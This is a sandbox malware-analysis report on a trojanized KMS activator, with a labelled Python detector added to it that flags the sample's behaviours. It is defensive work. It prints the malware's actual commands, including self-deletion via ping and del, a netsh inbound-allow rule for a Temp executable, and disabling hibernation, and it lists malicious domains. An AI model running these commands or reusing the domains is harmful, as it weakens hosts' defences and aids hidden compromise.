Windows Analysis Report
HEU_KMS_Activator.exe

Overview

General Information

Sample name: HEU_KMS_Activator.exe
Analysis ID: 1480974
MD5: 28c6bc044e78763a789638242f708f9e
SHA1: d6670c2e2d8646b6ea5acc292bfcb5c6f4f14cd2
SHA256: d9c9cbc0fccd8f456e76d55b3be079b4f062272e2777f02d7438de4310357e36
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary is likely a compiled AutoIt script file
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Suspicious Ping/Del Command Combination
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • HEU_KMS_Activator.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\HEU_KMS_Activator.exe" MD5: 28C6BC044E78763A789638242F708F9E)
    • _J8156NOVDEC.exe (PID: 2928 cmdline: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe MD5: 1474BD3EDA2E087560754241A0B92991)
      • cmd.exe (PID: 2868 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5756 cmdline: ping -n 3 127.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • HEU_KMS_Activator.exe (PID: 4452 cmdline: C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe MD5: 7CD8B711BE93FF8858B7DC753C4065CA)
      • cmd.exe (PID: 2584 cmdline: C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6600 cmdline: C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6636 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5108 cmdline: netsh advfirewall firewall delete rule name="HEU_KMS_Activator" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 1432 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3032 cmdline: netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • 7Z.EXE (PID: 7428 cmdline: C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489 MD5: 42BADC1D2F03A8B1E4875740D3D49336)
        • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kms_x64.exe (PID: 7728 cmdline: C:\Windows\_temp07242019502489\kms_x64.exe MD5: 99DF73A907996E98E96917FAE743B506)
    • DvLayout.exe (PID: 6024 cmdline: "C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook MD5: 99B17FCCE8D54EA90FF5C0B9EF4FCE73)
      • powercfg.exe (PID: 1408 cmdline: powercfg /h off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wrme.exe (PID: 6296 cmdline: "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install MD5: 35C545E719D8D04771BE35081626CE3B)
  • J8156NOVDEC.exe (PID: 2760 cmdline: C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe MD5: 1474BD3EDA2E087560754241A0B92991)
    • WMIC.exe (PID: 7356 cmdline: wmic BaseBoard get SerialNumber MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4708 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5888 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 4696 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6500 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4428 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5756 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7276 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 3964 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7516 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8132 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
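As an added example (not part of the Joe Sandbox report or of the sample), the following Python parses the process tree above from its text form and applies a handful of rules to the behaviours it shows: a cmd.exe that pings localhost as a delay and then deletes its own parent's image, netsh adding an inbound allow rule for a binary under the user's Temp directory, powercfg /h off, a WMI baseboard-serial query, an executable launched from the drivers directory, and a payload staged under a Microsoft-looking AppData path. The tree text is pasted in as a constructed input; the rule names and regexes are the example's own and are not Joe Sandbox signatures, and 8.3 short names such as user~1 are compared textually rather than expanded.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: process-tree lines from the report above, pasted into a raw
# string and trimmed to the processes the rules below look at. Indentation
# encodes parent/child exactly as the Joe Sandbox tree does.
TREE = r"""
  • HEU_KMS_Activator.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\HEU_KMS_Activator.exe" MD5: 28C6BC044E78763A789638242F708F9E)
    • _J8156NOVDEC.exe (PID: 2928 cmdline: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe MD5: 1474BD3EDA2E087560754241A0B92991)
      • cmd.exe (PID: 2868 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • PING.EXE (PID: 5756 cmdline: ping -n 3 127.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • HEU_KMS_Activator.exe (PID: 4452 cmdline: C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe MD5: 7CD8B711BE93FF8858B7DC753C4065CA)
      • cmd.exe (PID: 1432 cmdline: C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • netsh.exe (PID: 3032 cmdline: netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • DvLayout.exe (PID: 6024 cmdline: "C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook MD5: 99B17FCCE8D54EA90FF5C0B9EF4FCE73)
      • powercfg.exe (PID: 1408 cmdline: powercfg /h off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
      • wrme.exe (PID: 6296 cmdline: "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install MD5: 35C545E719D8D04771BE35081626CE3B)
  • J8156NOVDEC.exe (PID: 2760 cmdline: C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe MD5: 1474BD3EDA2E087560754241A0B92991)
    • WMIC.exe (PID: 7356 cmdline: wmic BaseBoard get SerialNumber MD5: E2DE6500DE1148C7F6027AD50AC8B891)
  • svchost.exe (PID: 7276 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
"""

# One tree line: indentation, image name, PID, command line, MD5 of the image.
LINE = re.compile(
    r'^(?P<indent> *)• (?P<name>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) '
    r'MD5: (?P<md5>[0-9A-Fa-f]{32})\)$'
)

@dataclass
class Proc:
    pid: int
    name: str
    cmdline: str
    parent: Optional["Proc"]

def parse_tree(text: str) -> List[Proc]:
    """Turn the indented tree into Proc records, linking each one to its parent."""
    procs, stack = [], []          # stack: (indent width, Proc) of the open ancestors
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        depth = len(m["indent"])
        while stack and stack[-1][0] >= depth:   # a shallower line closes deeper ancestors
            stack.pop()
        proc = Proc(int(m["pid"]), m["name"], m["cmd"], stack[-1][1] if stack else None)
        procs.append(proc)
        stack.append((depth, proc))
    return procs

def image(cmdline: str) -> str:
    """First token of a command line with surrounding quotes removed."""
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(" ", 1)[0]

# Heuristics written for this example; they mirror the report's signatures, not Joe Sandbox code.
PING_DEL    = re.compile(r'ping\s+-n\s+\d+\s+\S+\s*>\s*nul\s*&\s*del\s+(?:/\S+\s+)*(?P<target>\S+)', re.I)
FW_ALLOW    = re.compile(r'advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b.*\bprogram="?(?P<prog>[^"\s]+)', re.I)
TEMP_DIR    = re.compile(r'\\AppData\\Local\\Temp\\', re.I)
HIBERNATE   = re.compile(r'\bpowercfg(?:\.exe)?\s+/h\s+off\b', re.I)
BASEBOARD   = re.compile(r'\bbaseboard\s+get\s+serialnumber\b', re.I)
DRIVERS_EXE = re.compile(r'\\(?:System32|SysNative)\\drivers\\[^\\]+\.exe$', re.I)
MASQ_DIR    = re.compile(r'\\AppData\\Local\\Microsoft\\Event Viewer\\', re.I)

def evaluate(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs for every rule a process trips."""
    findings = []
    for p in procs:
        cmd, img = p.cmdline, image(p.cmdline)
        m = PING_DEL.search(cmd)
        if m:
            # 8.3 short names (user~1) are compared textually here; a live detector
            # would expand them with GetLongPathName before comparing.
            parent_img = image(p.parent.cmdline) if p.parent else ""
            same = m["target"].lower() == parent_img.lower()
            findings.append((p.pid, "self-deletion of parent image" if same else "ping-delay then delete"))
        m = FW_ALLOW.search(cmd)
        if m and TEMP_DIR.search(m["prog"]):
            findings.append((p.pid, "inbound firewall allow for a Temp binary"))
        if HIBERNATE.search(cmd):
            findings.append((p.pid, "hibernation disabled (powercfg /h off)"))
        if BASEBOARD.search(cmd):
            findings.append((p.pid, "baseboard serial queried (VM check)"))
        if DRIVERS_EXE.search(img):
            findings.append((p.pid, "executable launched from the drivers directory"))
        if MASQ_DIR.search(img):
            findings.append((p.pid, "binary staged in a Microsoft-looking AppData directory"))
    return findings

if __name__ == "__main__":
    procs = parse_tree(TREE)
    names = {p.pid: p.name for p in procs}
    for pid, finding in evaluate(procs):
        print(f"PID {pid:>5} {names[pid]:<22} {finding}")
```

On a live host the same rules would run over Sysmon Event ID 1 or Security 4688 records, with ParentImage taken from the event rather than from indentation; the parser exists only so the report's own tree can be reused as input. Note that both the cmd.exe wrapper and the netsh.exe child trip the firewall rule, which is the expected shape when a script runs netsh through cmd /c.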
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Ilya Krestinichev
  Command: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
  Image: C:\Windows\SysWOW64\cmd.exe (ProcessId 2868)
  ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
  ParentImage: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe (ParentProcessId 2928)
Source: Process started; Author: frack113, Nasreddine Bencherchali
  Command: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
  Image: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe (ProcessId 2928)
  ParentCommandLine: "C:\Users\user\Desktop\HEU_KMS_Activator.exe"
  ParentImage: C:\Users\user\Desktop\HEU_KMS_Activator.exe (ParentProcessId 4428)
Source: Process started; Author: vburov
  Command: C:\Windows\System32\svchost.exe -k NetworkService -p
  Image: C:\Windows\System32\svchost.exe (ProcessId 4708)
  ParentCommandLine: (not recorded)
  ParentImage: (not recorded) (ParentProcessId 624)
No Snort rule has matched
Timestamp                        SID      Src Port  Dst Port  Proto  Classtype
2024-07-25T02:19:51.775160+0200  2803274  49699     80        TCP    Potentially Bad Traffic
2024-07-25T02:19:53.034129+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:53.037548+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:53.037690+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:53.037758+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:53.124191+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:53.124522+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:53.251253+0200  2012510  80        49699     TCP    Potentially Bad Traffic
2024-07-25T02:19:58.844006+0200  2840787  49713     443       TCP    Potentially Bad Traffic
2024-07-25T02:20:06.787407+0200  2022930  443       49717     TCP    A Network Trojan was detected
2024-07-25T02:20:45.968967+0200  2022930  443       49737     TCP    A Network Trojan was detected


AV Detection

Source: HEU_KMS_Activator.exe; Avira: detected
Source: https://db.testyk.com/api/v1/p; Avira URL Cloud: Label: malware
Source: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1; Avira URL Cloud: Label: malware
Source: https://db.testyk.com; Avira URL Cloud: Label: malware
Source: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1Y; Avira URL Cloud: Label: malware
Source: https://db.testyk.com/api/v1/ppk?; Avira URL Cloud: Label: malware
Source: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73d; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Avira: detection malicious, Label: TR/Agent.vdqps
Source: C:\Windows\System32\drivers\KMDF_LOOK.sys; Avira: detection malicious, Label: HEUR/AGEN.1303604
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Avira: detection malicious, Label: TR/Agent.vdqps
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe; Avira: detection malicious, Label: RKIT/Agent.xdjdp
Source: C:\Windows\System32\drivers\DvLayout.exe; Avira: detection malicious, Label: TR/Agent.ugoop
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Avira: detection malicious, Label: RKIT/Agent.moamk
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe; Avira: detection malicious, Label: TR/Agent.tzwxs
Source: C:\Windows\System32\drivers\KMDF_Protect.sys; Avira: detection malicious, Label: HEUR/AGEN.1303604
Source: du.testjj.com; Virustotal: Detection: 9%
Source: db.testyk.com; Virustotal: Detection: 9%
Source: https://du.testjj.com/api/v1/ido; Virustotal: Detection: 12%
Source: https://du.testjj.com/api/v1/idt; Virustotal: Detection: 11%
Source: https://du.testjj.com; Virustotal: Detection: 9%
Source: https://du.testjj.com/api/v1/ide; Virustotal: Detection: 8%
Source: https://du.testjj.com/api/v1/idh; Virustotal: Detection: 11%
Source: https://db.testyk.com/api/v1/p; Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exe; ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe; ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe; ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe; ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; ReversingLabs: Detection: 86%
Source: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe; ReversingLabs: Detection: 65%
Source: C:\Windows\System32\drivers\DvLayout.exe; ReversingLabs: Detection: 69%
Source: C:\Windows\System32\drivers\KMDF_LOOK.sys; ReversingLabs: Detection: 88%
Source: C:\Windows\System32\drivers\KMDF_Protect.sys; ReversingLabs: Detection: 50%
Source: C:\Windows\_temp07242019502489\kms-client.exe; ReversingLabs: Detection: 33%
Source: C:\Windows\_temp07242019502489\kms-server.exe; ReversingLabs: Detection: 48%
Source: C:\Windows\_temp07242019502489\kms.exe; ReversingLabs: Detection: 56%
Source: C:\Windows\_temp07242019502489\x64\SECOPatcher.dll; ReversingLabs: Detection: 45%
Source: C:\Windows\_temp07242019502489\x86\SECOPatcher.dll; ReversingLabs: Detection: 32%
Source: C:\Windows\system32\drivers\CbDServices.sys (copy); ReversingLabs: Detection: 50%
Source: C:\Windows\system32\drivers\mvtnom.sys (copy); ReversingLabs: Detection: 88%
Source: HEU_KMS_Activator.exe; ReversingLabs: Detection: 68%
Source: HEU_KMS_Activator.exe; Virustotal: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\autC8A0.tmp; Joe Sandbox ML: detected
Source: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe; Joe Sandbox ML: detected
Source: C:\Windows\_temp07242019502489\kms.exe; Joe Sandbox ML: detected
Source: HEU_KMS_Activator.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_00680250 GetModuleHandleA,GetProcAddress,CertOpenStore,GetLastError,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,@_RTC_CheckStackVars@8,2_2_00680250
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_006BA2F0 CryptAcquireContextA,CryptCreateHash,2_2_006BA2F0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_006BA360 CryptHashData,2_2_006BA360
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_006B03E0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,ReadFile,GetLastError,_strlen,_strstr,_strlen,_strstr,CryptQueryObject,GetLastError,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,CloseHandle,@_RTC_CheckStackVars@8,2_2_006B03E0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_006BA390 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_006BA390
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_00682F50 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_00682F50
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_00683030 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_00683030
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_006B3790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_006B3790
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_00683BC0 CryptAcquireContextA,CryptCreateHash,2_2_00683BC0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_00683C50 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,2_2_00683C50
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe; Code function: 2_2_00683C20 CryptHashData,2_2_00683C20
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C40250 GetModuleHandleA,GetProcAddress,CertOpenStore,GetLastError,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,@_RTC_CheckStackVars@8,3_2_00C40250
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C7A2F0 CryptAcquireContextA,CryptCreateHash,3_2_00C7A2F0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C703E0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,ReadFile,GetLastError,_strlen,_strlen,CryptQueryObject,GetLastError,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,CloseHandle,@_RTC_CheckStackVars@8,3_2_00C703E0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C7A390 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C7A390
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C7A360 CryptHashData,3_2_00C7A360
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C42F50 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C42F50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C43030 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C43030
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C73790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C73790
